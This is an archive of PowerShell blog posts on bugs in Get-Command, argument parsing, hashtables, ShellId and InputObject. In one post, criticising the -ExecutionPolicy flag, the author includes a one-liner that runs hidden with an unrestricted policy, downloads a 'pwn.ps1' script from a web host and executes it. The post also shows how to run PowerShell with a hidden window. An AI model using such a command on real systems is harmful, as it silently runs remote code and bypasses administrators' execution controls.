Tag Archives: Bugs

Get-Command in PowerShell 3 (NOTE: CTP2 Bug causes module loading)

I don’t normally blog about the bugs I find in beta software, but I posted this bug to PowerShell’s Connect and I feel like it got ignored and not voted, so I’m going to try to explain myself better here … The bug is on Connect, but let me talk to you first about how Get-Command is supposed to work.

In PowerShell, Get-Command is a command that serves two purposes: first it lets you search for commands using verb, noun, wildcards, module names etc. and then it also returns metadata about commands. In PowerShell 2, it could only search commands that were in modules (or snapins) you had already imported, or executables & scripts that were in your PATH.

So here’s the deal: Get-Command has always behaved differently when it thinks you’re searching. The only way it can tell that you’re searching is that you don’t provide a full command name. So, if you use a wildcard (e.g.: Get-Command Get-Acl* or even Get-Command Get-Ac[l]), or search using a Noun or Verb (e.g.: Get-Command -Verb Get or Get-Command -Noun Acl or even Get-Command -Verb Get -Noun Acl), then PowerShell assumes you’re searching (and won’t throw an error when no command is found).

In PowerShell 3, because modules can be loaded automatically when you try to run a command from them, Get-Command had to be modified to be able to return commands that aren’t already loaded. The problem the PowerShell team faced is that in order to get the metadata about a command, they needed to actually import the module. What they came up with is that if you’re searching … then Get-Command will not load modules which aren’t already loaded. If you specify a full command name with no wildcards, then PowerShell will load any module(s) where it finds a matching command in order to get the metadata (parameter sets, assembly info, help, etc). And of course, if you specify a full command that doesn’t exist, you’ll get an error!

Perhaps a few examples will help:

Launch PowerShell 3 using:

powershell -noprofile -noexit -command "function prompt {'[$($myinvocation.historyID)]: '}"
 

And then try this, noticing how much more information you get when you specify a specific full name:


[1]: Get-Module
[2]: Import-Module Microsoft.PowerShell.Utility
[3]: Get-Command -Verb Get -Noun Acl | Format-List

Name             : Get-Acl
Capability       : Cmdlet
Definition       : Get-Acl
Path             :
AssemblyInfo     :
DLL              :
HelpFile         :
ParameterSets    : {}
ImplementingType :
Verb             : Get
Noun             : Acl


[4]: Get-Module

ModuleType Name                                ExportedCommands
---------- ----                                ----------------
Manifest   Microsoft.PowerShell.Utility        {Add-Member, ...}

[5]: Get-Command Get-Acl | Format-List

Name             : Get-Acl
Capability       : Cmdlet
Definition       : Get-Acl [[-Path] <string[]>] [-Audit]
                   [-AllCentralAccessPolicies] [-Filter <string>]
                   [-Include <string[]>] [-Exclude <string[]>]
                   [-UseTransaction] [<CommonParameters>]

                   Get-Acl -InputObject <psobject> [-Audit]
                   [-AllCentralAccessPolicies] [-Filter <string>]
                   [-Include <string[]>] [-Exclude <string[]>]
                   [-UseTransaction] [<CommonParameters>]

                   Get-Acl [[-LiteralPath] <string[]>] [-Audit]
                   [-AllCentralAccessPolicies] [-Filter <string>]
                   [-Include <string[]>] [-Exclude <string[]>]
                   [-UseTransaction] [<CommonParameters>]
Path             :
AssemblyInfo     :
DLL              : C:\Windows\Microsoft.Net\assembly\GAC_MSIL\
                   Microsoft.PowerShell.Security\
                   v4.0_3.0.0.0__31bf3856ad364e35\
                   Microsoft.PowerShell.Security.dll
HelpFile         : Microsoft.PowerShell.Security.dll-Help.xml
ParameterSets    : {[[-Path] <string[]>] [-Audit]
                   [-AllCentralAccessPolicies] [-Filter <string>]
                   [-Include <string[]>] [-Exclude <string[]>]
                   [-UseTransaction] [<CommonParameters>],
                   -InputObject <psobject> [-Audit]
                   [-AllCentralAccessPolicies] [-Filter <string>]
                   [-Include <string[]>] [-Exclude <string[]>]
                   [-UseTransaction] [<CommonParameters>],
                   [[-LiteralPath] <string[]>] [-Audit]
                   [-AllCentralAccessPolicies] [-Filter <string>]
                   [-Include <string[]>] [-Exclude <string[]>]
                   [-UseTransaction] [<CommonParameters>]}
ImplementingType : Microsoft.PowerShell.Commands.GetAclCommand
Verb             : Get
Noun             : Acl


[6]: Get-Module

ModuleType Name                                ExportedCommands
---------- ----                                ----------------
Manifest   Microsoft.PowerShell.Security       {ConvertFrom-Sec...}
Manifest   Microsoft.PowerShell.Utility        {Add-Member, ...}
 

But there are several problems:

Get-Command has another parameter: -Module, which allows you to specify which modules should be searched, and in PowerShell 3, it changes the behavior in weird (buggy) ways:

  1. If you specify a single module, then that module is imported (to search it more thoroughly?), even if you specify a specific command that’s not in that module.
  2. If you specify a single module that does not have a command that matches, then Microsoft.PowerShell.Management is loaded also. I don’t know why yet.
  3. If you specify more than one module, and you’re searching, and none of them have a command that matches … it’s just as though you hadn’t specified modules, and nothing unexpected happens.
  4. If you specify more than one module, and a specific command, then it gets really wierd:
    • If the command is in one (or more) of the specified modules, the first module (in PATH order, not the order you specified) which you listed that has the command is imported.
    • If it’s a valid command in a different module, the first module with the command is loaded … and so is Microsoft.PowerShell.Management. I don’t know why! Oh, and you still get the error because it can’t find the command where you told it to look.

I filed a bug on Connect to cover that last scenario where the module containing the command is loaded even though you gave Get-Command a list of modules to look in, here’s another example, and notice that even though all I do here is run the same command over and over (I added some Get-Module to show you WHY you get these results, but it’s the same without them), but I get different results:


[1]: Import-Module Microsoft.PowerShell.Utility
[2]: Get-Module

ModuleType Name                                ExportedCommands
---------- ----                                ----------------
Manifest   Microsoft.PowerShell.Utility        {Add-Member, ...}


[3]: Get-Command Get-Acl -module (Get-Module) # Passes one module
Get-Command : The term 'get-acl' is not recognized as the name of a
cmdlet, function, script file, or operable program. Check the
spelling of the name, or if a path was included, verify that the
path is correct and try again.

[4]: Get-Module

ModuleType Name                                ExportedCommands
---------- ----                                ----------------
Manifest   Microsoft.PowerShell.Management     {Add-Computer, ...}
Manifest   Microsoft.PowerShell.Utility        {Add-Member, ...}


[5]: Get-Command Get-Acl -module (Get-Module) # Passes two modules
Get-Command : The term 'get-acl' is not recognized as the name of a
cmdlet, function, script file, or operable program. Check the
spelling of the name, or if a path was included, verify that the
path is correct and try again.

[6]: Get-Module

ModuleType Name                                ExportedCommands
---------- ----                                ----------------
Manifest   Microsoft.PowerShell.Management     {Add-Computer, ...}
Manifest   Microsoft.PowerShell.Security       {ConvertFrom-Sec...}
Manifest   Microsoft.PowerShell.Utility        {Add-Member, ...}

[7]: # This time it will include Microsoft.PowerShell.Security!
[7]: Get-Command Get-Acl -module (Get-Module)

Capability      Name                ModuleName
----------      ----                ----------
Cmdlet          Get-Acl             Microsoft.PowerShell.Security
 

Visual Studio Not Responding (beeping) when editing ASPX

I’m just going to share the solution, in case anyone else encounters this after installing Office 2007 or 2010

Yesterday I came across a very strange bug which was causing Visual Studio to lock up after a few (30?) seconds every time I opened an ASPX file for editing. I even uninstalled a few VS addons I thought might have caused it… but that didn’t help (I’m reinstalling Resharper as I type this).

After much frustration and a couple of Bing searches … it turned out to be a problem with MS Office 2007 components. This was a bit of a surprise, since I do not have Office 2007 installed. However, I do have Office Communicator and Live Meeting which are Office 2007 products — and I had just installed Office 2010, which may have actually caused the problem.

Rinat Abdullin wrote about the problem earlier and there’s a thread on StackOverflow which is at least related.

Basically: you get “beeping” when you try to click in the text editor for aspx, or on the Solution Explorer … (sometimes, but not always, Visual Studio will actually be marked as “Not Responding” by Windows) – and, when this happens, you look in your TaskManager and see this Setup.exe process.

This one — in your %CommonProgramFiles% or %CommonProgramFiles(x86)%:
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE12\Office Setup Controller\SETUP.EXE

Shutting down Visual Studio and then running that installer “as administrator” manually has solved the problem for me. I just hit “Repair” and that was that. Others (including Rinat) have said they had to reinstall Office — I suspect that probably depends on whether or not you had Office 2007 installed in the first place.

Reblog this post [with Zemanta]

Rage Against the Design

So we found a problem recently with a certain scripting language’s argument parsing:


function Test-Argument($a) {
   $a.GetType().FullName
}

[Test 1]: Test-Argument 4
System.Int32
[Test 2]: Test-Argument .5
System.Double
[Test 3]: Test-Argument "hello"
System.String
[Test 4]: Test-Argument Goodbye
System.String
[Test 5]: Test-Argument -42
System.String
[Test 6]: Test-Argument (-42)
System.Int32
 

Why can’t it properly parse -42 as an integer, when it can parse .5 as a double? Well, according to the development team of a certain Fortune 100 company, this behavior is by-design ... Apparently, “.” can be a number, but “-” can’t.

When you know you’ve got it all wrong, but you can’t be bothered to get it right, document it — make it look intentional, and most people won’t question you.

I’m sorry folks, but I’ve had it up to here with the “it’s by design” excuse. I don’t care who you are, and I don’t care who wrote the design spec — when something is as obviously wrong as this, you need to fix it, not just give us platitudes.

I had the same thing happen recently with a bug I filed about the way wildcard behavior impedes matching file-names with square brackets in them in PowerShell. They told me this was by design, and that I could use the -LiteralPath parameter. Well, if any of you have tried this, you already know what I’m going to say: it’s broken.


## This works if the file already exists
## But fails completely if it doesn't exist
set-content -LiteralPath "logs [www.example.com].txt" -Value " help "
 

And yet, I was initially told it was supposed to be this way. Now, in this case, I happened to have the email address of the software architect, and they’ve reopened my bug after I sent him an email with lots of examples of how this bug defied the behavior that a user expects.

We software developers need to be very careful about saying “that’s by design” ... because it sometimes makes us sound stupid. When a user says “this is broken,” and your reply is “that’s by design,” what the user hears is “we broke it on purpose.” We should not be willing to excuse bad design.

Listen up: If you want to be a successful software developer, you need to learn this, and learn it well: the fact that it was DESIGNED WRONG is NOT AN EXCUSE for shipping broken software. Regardless of whether it’s your design, or someone else’s, even if it was designed this way by your manager’s boss. When you create software that doesn’t behave the way the user expects it to, you need to consider the possibility that you’re doing it wrong.

Imagine if architectural engineers were to behave in a similar manner … Suppose the original architect of the golden gate bridge had left a gap in the middle of the bridge, with a little ramp: you could drive up the bridge, but you couldn’t get across unless you were comfortable jumping your car across a four foot opening.

When you complained about it, the engineers would say: it’s by design — if you don’t like jumping your car (and yes, we know that jumping is bad for maintainability), there is a workaround: just wait for the ferry we put in last year. There are several boats, running continuously, so the wait is at maximum about 20 minutes, and it only takes a little longer to cross by boat than it would on the bridge.

That analogy is obviously not perfect, but the point is: just because someone decided it should be done a certain way doesn’t mean that’s the right thing to do — sometimes the design is just wrong. Perhaps the designer and architects overlooked something, or perhaps the circumstances have changed, but in any case, if the software doesn’t work the way people expect it to work, or requires different workarounds depending on the situation … you need to question the design.

All I’m asking is this: don’t turn your brain off: when someone complains about the way something works (or doesn’t work), think about what they’re asking, and if the complaint makes sense, don’t say “this misbehavior is by design” until you’ve reconsidered the design.

PowerShell 2 CTP3 – First Impressions

Changes of particular interest

Get-Command returns functions

By default Get-Command used to return only apps, scripts in your path, and cmdlets… The new CTP3 default invocation includes functions. This is mostly a recognition of the increased power of functions with the arrival of that advanced function features (formerly known as script cmdlets).

Advanced Functions

Advanced Functions is the new name for what was called “Script Cmdlets” in CTP2. Instead of adding a CMDLET keyword to the language, we now have a [CmdletBinding()] attribute which can be specified in your functions —just before the PARAM block— which will enable all of the features which were exclusive to CMDLETs in CTP2. NOTE: Unlike in C#, the parentheses in [CmdletBinding()] are REQUIRED to differentiate it from PowerShell’s type notation.

I will write an entire article about Advanced Functions soon, because there is a lot to write about, and after struggling with them for several hours today, it’s clear that the about * documentation for them is mostly wrong and misleading. The PowerShell team blog post about Advanced Functions has some working examples, so start there and in the release notes (none of the about_functions_advanced samples will run — I wrote a bug about this, please vote for it if you agree).

Functions have help!

This is, without a doubt, my favorite feature so far. You can embed help for functions in comments inside the function block, and Get-Help will find and parse it. Not only that, but your functions get automatic implementation of the -? parameter, bringing script functions closer to equality with compiled cmdlets, in terms of user experience.

Cmdlet name collisions

You can now have two snapins or modules loaded which export the same cmdlets (or different ones with the same name). PowerShell resolves to the last one loaded by default. You can run previously loaded ones that have been hidden by specifying the full namespace\cmdlet path.

Modules

There has been a complete refactoring of the module system such that the environment variable and default Module folders have been renamed, and the cmdlets as well (Add-Module becomes Import-Module and New-Module). The “Module Metadata” support has been finished, so you can create .psd1 metadata files which wrap modules and expose additional features. Thanks to the data in those Metadata files, Get-Module now returns much more information about modules, including the author’s name, copyright info, etc. This is another area where I’ll have a whole article about the new functionality up soon, as an update to my former article about modules.

Lots of other things ;)

It’s not my intention to rewrite the release notes here… I just wanted to call attention to some of the stuff that’s most interesting to me. You should definitely read the release notes

Other improvements

Eventing

In a sense, we had PSEvents in CTP2. But in this release they’ve been beefed up, renamed a little, and are become a very useful way for cmdlet authors to expose functionality (you can create your own system-level events which users can write scripts to handle and target).

Exception Handling

I’m not really sure this counts as improved over CTP2, but a lot of people seem to be unaware that PowerShell v2 now supports the C#-like try{ ... } catch { ... } finally { ... } block, and allows you to specify multiple exceptions to be trapped by a single catch statement (I wish C# would implement that).

Command-line Parameters

There are two new parameters to PowerShell:

-WindowStyle

This lets you execute PowerShell “Hidden” or at least “Minimized” so that your startup or scheduled tasks don’t need to pop up windows that interrupt the user! Hurray! In fact, not only can you launch PowerShell hidden, you can hide the running host window by just running a PowerShell instance in it (it stays hidden even after PowerShell exits — that might be considered a bug, but I’m not really sure what I think of it). This would be most useful if you were trying to do GUI stuff in your scripts, but I’m sure you can think of other uses… here’s an example (IAA= is just a space, encoded).


powershell -win hidden -nop -enc IAA=
## any output here won't be seen ...
[Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
[Windows.Forms.MessageBox]::Show("Hello from PowerShell",$pd)
write-host "Hello" -back Green;
Clear-Host
## but this output will be, once the window returns...
write-host "And now back to your regularly scheduled program..." -fore Green;
powershell -win normal -nop -enc IAA=
 

It even works in DOS:


powershell -win hidden -nop -enc IAA=
; any output here won't be seen ...
echo "Hello World!"
cls
; and this will be...
dir /w
powershell -win normal -nop -enc IAA=

-ExecutionPolicy

You can override the ExecutionPolicy on the command line. This is very interesting (and rather worrying). It’s my opinion that this option completely breaks the Execution Policy system because you don’t have to be elevated/administrator to use the flag.

What I’m trying to say is that in a business environment, where users are not administrators on their own systems, this flag seems to allow users to ignore the administrator’s script execution policy, and even modify their default shortcuts to just start with whatever setting they prefer. Currently (in v1 and v2) the Set-ExecutionPolicy cmdlet requires administrative rights (and an elevated console, on Vista), but this commandline argument means that anyone can just run PowerShell -EP Unrestricted to get around that.

This seems to render the setting a lot less useful, since it only applies if the user doesn’t know they can override it, or if the setting is unrestricted enough that the user doesn’t feel constrained by it. My guess is that the ExecutionPolicy parameter should either disappear, or be constrained to making the policy more restrictive than the default. Here’s my scary batch/vbs script:


powershell -ex unrestricted -win hidden -com {imo FileTransfer; new-filetransfer http://jaykul.com/pwn.ps1 $Env:Temp\pwn.ps1; &amp; $Env:Temp\pwn.ps1}

If you have an opinion, vote here

Possible bugs?

[char] comparisons are supposed to be alphabetical

Formerly, comparisons of objects of type [char] (characters) were done as integers (against the unicode character value), but in CTP3 characters are supposed to behave as text, basically the same way strings do when it comes to case-insensitive comparison (except that, to keep them compatible, you must specify -IEQ to compare insensitive). This works fine in a case like: ([char]'a') -ieq 'A' but inexplicably fails for ([char]'a') -ieq ([char]'A') … which leads me to believe the team has simply hard-coded an exception for the CHAR-to-STRING comparison, and missed CHAR-to-CHAR. I wrote that up too, and hope you’ll take the time to agree or disagree (a couple of people in IRC mentioned that after this strangeness they just want it back the way it was).

I’m sure I’ll have more to write here tomorrow …

PowerShell and Hashtable oddities

Hashtables are IEnumerable, but they don’t behave that way in PowerShell … this seems to cause all sorts of odd behavior and such, so I thought I’d write up all the examples I can think of in one place. That means this post is going to be a little bit rambling, so please bear with me.

PowerShell enumerates IEnumerable


add-type @"
<code lang="
csharp">
using System.Collections;
public class enumer : IEnumerable {
  public IEnumerator GetEnumerator() {
    for(int i = 0; i < 10; i++) {
     yield return i;
   }
  }
}
"
@

$e -is [Collections.IEnumerable]      # is true
$e = new-object enumer
$e                                    # will output 0..9 to the console
$e.GetEnumerator()                    # will output the same
$e | measure-object                   # will show a count of 10.

$table = @{test="This is a test";exam="this is an exam";defense="defend your thesis"}

$table -is [Collections.IEnumerable]  # is true too!

$table                                # will output three DictionaryEntry items
$table.GetEnumerator()                # will output the same thing
$table.Count                          # will output 3
$table | measure-object               # will output 1! WHAT!?
 

It turns out that in the case of Hashtables, PowerShell does NOT enumerate them into the pipeline. Instead, it passes the entire Hashtable object. Of course, nobody realizes this … because the ouput cmdlets unwrap them (what?!).

But there are bugs caused by special treatment

The first bug is in Add-Member, which doesn’t work on Hashtables until you’ve already used the Hashtable.


$table = @{test="This is a test";exam="this is an exam";defense="defend your thesis"}
Add-Member -in $table NoteProperty Quiz "Surprise, hope you're ready!"
$table.Quiz  # It's not there! There is NO OUTPUT
Add-Member -in $table NoteProperty Quiz "Surprise, hope you're ready!"
$table.Quiz  # This time it works ...
 

NOT ONLY does Add-Member not work the first time, it’s not just a matter of calling it twice: you just have to try to access something in the hashtable before you can use Add-Member on it:


$table = @{test="This is a test";exam="this is an exam";defense="defend your thesis"}
Add-Member -in $table NoteProperty Puzzle "How on earth does this work?"
Add-Member -in $table NoteProperty Quiz   "Surprise, hope you're ready!"
$table.Quiz  # It's not there! There is NO OUTPUT
Add-Member -in $table NoteProperty Quiz   "Surprise, hope you're ready!"
Add-Member -in $table NoteProperty Puzzle "How on earth does this work?"
$table | gm -type NoteProperty | %{ $_.Name }  # Output: Puzzle, Quiz
 

Here’s another buggy manifestation, in the Formatting cmdlets. This time, the Format-* cmdlets unroll the hashtable … to make it look like it’s being enumerated the way it should be.


$table = @{test="This is a test";exam="this is an exam";defense="defend your thesis"}
## Prime it, and then Add-Member won't work
$table.PrimeTheHashtableSoWeCanAddMember
Add-Member -in $table NoteProperty Quiz   "Surprise, hope you're ready!"

## Note how Measure-Object and Get-Member operate on the HASHTABLE
## There's only a single item, of course...
$table | measure-object | %{$_.Count}  
## And we have 7 Properties, plus the Quiz NoteProperty
$table | get-member -type Properties | %{ $_.Name }

## But Format-List shows the properties of the ITEMS
## So we think we can list those properties like:
$table | format-list *
 

Clearly, the Format-* cmdlets have magic code that unwraps hashtables. Which just leads to even more confusion: $table looks the same (in the console output) as $table.GetEnumerator() ... but it doesn’t behave the same way, EXCEPT to the format cmdlets.

PowerShell 2.0 uses Hashtables more

In PowerShell 2.0, the PowerShell team is adding another special feature based on hashtables (which appears at first to be based on IEnumerables):

Jeffrey Snover gave an example of splatting in his PDC presentation. Splatting is where a collection is unwrapped so that you can take an array of values and pass one to each parameter of a cmdlet or function. But in Jeffrey Snover’s demo, he splatted a hashtable. Basically, the hashtable keys are matched up to parameter names as though they had been specified by name. That made me wonder why splatting can’t work with custom objects, but after investigating a bit, I’m actually frustrated with the inconsistency of how hashtables are treated in Posh.

  • In the splatting scenario they are unrolled as a collection of named parameters …
  • If you pipe them, they’re treated as a single object instead of being unrolled …
  • Even though you can access hashtable items using dotted property syntax, you can’t use them to set ValueFromPipelineByPropertyName values, because they aren’t really properties.

The new splatting feature seems to only work with simple arrays and hashtables … adding yet another scenario where the hashtable is being treated specially (even though it doesn’t need to be: if they just splatted IEnumerable, we could work with List, and any IEnumerable of DictionaryEntry objects, or KeyValuePair could be matched by name … that would make hashtables work, but it would also let you use the more powerful generic collections, etc.

You know what would be cool? If I could splat any object (like a custom PSObject that I have added members to), and have it’s property names matched to parameter names as though all the parameters had ValueFromPipelineByPropertyName set.

You know what would be really cool? If I could specify that I want pipeline objects splatted, forcing ALL parameters to be treated as ValueFromPipelineByPropertyName, without needing to use: ForEach-Object { Test-Splatting @_ } … maybe a syntax like: Get-HashTablesToSplat | Test-Splatting @@ …

A Better Get-Credential in one line of code

For too long I have ignored the deficiencies in Get-Credential, so now I am going to fix them. Ready?


function Get-Credential($caption,$msg,$domain,$name){$Host.UI.PromptForCredential($caption,$msg,$name,$domain)}

Ok, that’s better than the default, whew! ;) At least you can specify the prompt text and the domain and default user name … but there are so many other options that are missing from that dialog —like remembering my credentials for goodness sakes. I know many places forbid using the “remember” option for credentials, but why is that decision not up to me?

Well, I can’t make all of those options appear (at least, not without compiling a pinvoke function to call the Win32 API) nor can I force PowerShell to use the new Vista/2008 Credential function (which is Common Criteria compliant in Vista) instead of the older CredUIPromptForCredentials ... but I can give you the most requested feature for Get-Credential: a -Console option to force the prompt to happen in the console instead of in a “CredUI” pop up.

[new] Note: I kind-of messed up here, this will break if you’re used to using the -Credential parameter for Get-Credential to provide a default user name. I’ll fix it shortly.

Is PowerShell $ShellId too big a burden?

As you may know, I was one of the first developers who jumped on board and started working on an alternative PowerShell host (actually, I’m also the first to create a WPF-based host, and the first to create one that was open source … but enough about me).

Recently I’ve picked back up on that project, and am just about ready to release what I hope will be the last “pre-release” of PoshConsole before I declare it to be “beta” quality and start doing more regular releases. ;-)

Trivial example of inline WPF outputThe coolest features of PoshConsole, the ones that are really revolutionary, involve exposing the WPF surface to scripts and cmdlets so that you can actually have graphical output in the console — not popups, and not just for fun… but stuff like putting bar graphs behind the size columns in Get-ChildItem for folders, and the memory columns in Get-Process, etc… anyway.

So I’ve been writing a few scripts to show off the possibilities of PoshConsole, and was thinking about even posting them on the PoshCode.org PowerShell Script Repository, but I wanted a way to make clear that they’d only work in PoshConsole.

A little investigation later, and it was clear that PowerShell has a built in feature for this: #requires -ShellId PoshConsole … except, it doesn’t work. Actually, it doesn’t work for two reasons:

  1. PowerShell always ignores #requires -ShellId Anything
  1. No other PowerShell host implements ShellId as far as I can see

The ShellId is a read-only property of the RunspaceConfiguration, so to implement it in your PowerShell host you have to create your own RunspaceConfiguration class inheriting from the abstract base class. The problem is, there are some expensive side-effects:

  1. You have to configure the available .net Assemblies, Cmdlets, Format files, Initialization Scripts, Providers, Scripts, and Type files …
  2. Having your own ShellId means you don’t inherit anything from PowerShell.exe (like for instance, the ExecutionPolicy)
  1. Some cmdlets just don’t seem to work (Add-PSSnapin is just failing on me with “Object reference not set to an instance of an object”)

So … to sum up: PowerShell ignores #require -ShellId, and I can’t find another host (including Microsoft’s “Graphical PowerShell” and the latest and greatest PowerShell Plus Professional) that bothers to set the ShellId. Can anyone tell me a reason why I should bother with this?

Oh, and, can anyone give me some information about why Add-PSSnapin might be failing when I do set the ShellId?

[new] ShellId IS too big a burden.

After further investigation, it turns out that the reason Add-PSSnapin fails is because it uses a method AddPsSnapIn which is part of the RunspaceConfiguration (that you had to create yourself to set the ShellId), and you can’t implement that method (in fact, you can’t seem to override it with “new” either, I’ll have to look into that a little more).

In any case, the method has to return a PSSnapInInfo object, and since there are no public constructors for PSSnapinInfo objects, you’re sore-out-of-luck. It appears you would literally have to reverse engineer the whole “PSSnapin” system and create your own cmdlets and functionality around it to try to keep your host compatible with the main PowerShell. No wonder nobody’s done this…

I guess I’ll just go back to using Microsoft.PowerShell as my ShellId, I don’t know what I was thinking.

What’s the desired behavior of inputObject?

In response to Kirk Munro’s comment on my Writing Cmdlets for the PowerShell Pipeline post:

You know, I’ve looked at your articles about cmdlets/functions in the pipeline and I feel you’re missing something. The purpose of the InputObject parameter is to pass in a collection as a single object. This is as opposed to using the pipeline where a collection is passed along the pipeline one item at a time. There are cases where you want to pass in a collection as a collection.

Quite simply, I disagree. The documentation for these parameters says quite clearly that inputObject “Specifies an object or objects to input to the cmdlet.” This clearly means that I should be able to pass multiple objects, and have them treated as multiple objects, not as a single array object.

If you look at your example (Select -First 3 -Unique -InputObject $a), this does in fact work. It receives one object, an array. It then selects the first 3 objects, but there is only 1 so that is moot. And lastly it selects unique objects, but again there is only 1 so that is moot as well and finally the object is output using the default formatter. In this case the default formatter is showing the contents of the array.

In this example, Select-Object has no reason to take a single object as an input object, at all. The only time that it would be useful for Select-Object to take a single inputObject would be in combination with the property parameters. In fact, if you want to Select-Object from an array to get the first of last n objects, or to get a set of unique objects, you have to pass the objects in via the pipeline — there’s no other way to make it select from an array. If that was indeed the intent, it should have been written as a separate ParameterSet, and the documentation should be changed to reflect that only a single object can be passed in, and that you can’t use the inputObject parameter with the first, last, or unique parameters at all. That’s worse than useless, it’s misleading and confusing.

Kirk is absolutely right that if you assume that the InputObject argument is only allowed to take a single object, then the behavior is correct – but it’s not logical. In fact, the behavior you see in the output of this command is so useless as to be a bug – even if the documentation did not say the parameter accepts multiple objects as input:


Select-Object -input 4,5,6,4,8 -first 2 -unique
4
5
6
4
8

I know that that’s the way the built-in cmdlets work.

But quite frankly, just because someone important wrote something useless is no reason to emulate the behavior. The inputObject parameter IS the same parameter which pipeline objects go into. There’s no logical explanation for us to get different results when we pass an array in via the parameter by name instead of via pipeline: the PowerShell pipeline passing the things in the pipeline into the –inputObject parameter … it’s not using some mystical variable like it does in script functions.

Of course, we all know the powershell pipeline unwraps arrays — that’s convenient, and we can work around it when we really want to pass an array in:


PS> @([int[]]@(1,2,3,4)) | % { "Hi: $_" } # typecast and wrapped isn’t enough...
Hi: 1
Hi: 2
Hi: 3
Hi: 4

PS> @(,[int[]]@(1,2,3,4)) | % { "Hi: $_" } # put it as a member of another array
Hi: 1 2 3 4

PS> @(,@(,[int[]]@(1,2,3,4))) | % { "Hi: $_" }  # go too deep and “stuff” happens.
Hi: System.Int32[]

My point in all of this is that InputObject is actually a very useful parameter, because there are cases where you really want to pass a collection as a collection into a cmdlet and then do something with it. By making InputObject instead split the collection passed in and pipeline it through, you’re forcing users to wrap collections in an array just to get them passed in as a collection, and personally I don’t feel they should have to do that.

While it’s true that passing in an array is sometimes desirable that’s not the reason the parameter exists, and I don’t believe it should be the default behavior here. It should be just as easy for me to use the cmdlet with the inputObject parameter directly as it is to input them via the pipeline. If I put in unwrapping for the inputObject parameter, you can work around it in the same way I did in the examples above. Incidentally, I think *PowerShell* should unwrap arrays to ValueFromPipeline parameters regardless of whether they’re on the pipeline, but I recognize it’s probably too late for that.

Basically, this is my argument: If inputObject unwraps arrays, the syntax for passing an array by wrapping it in @(,$array) is simple, for those rare occasions when that’s actually what you want. But if it does not unwrap arrays, you’re forced to call it via a separate pipeline, because unwrapping the array and passing it in one at a time in a foreach loop will almost certainly not do the same thing, and this is much uglier — and not compatible with use within the pipeline, particularly if you need to pass the pipeline output into a different parameter.

I guess my final word would be to agree with Kirk that “InputObject … isn’t documented clearly enough” … in fact, it’s clearly behaving incorrectly according to the documentation, and that’s why I originally proposed to unwrap the inputObject parameter when it’s passed as a parameter: to make it work the way the documentation suggests it would, which seems to me to be a better way than the way it actually works.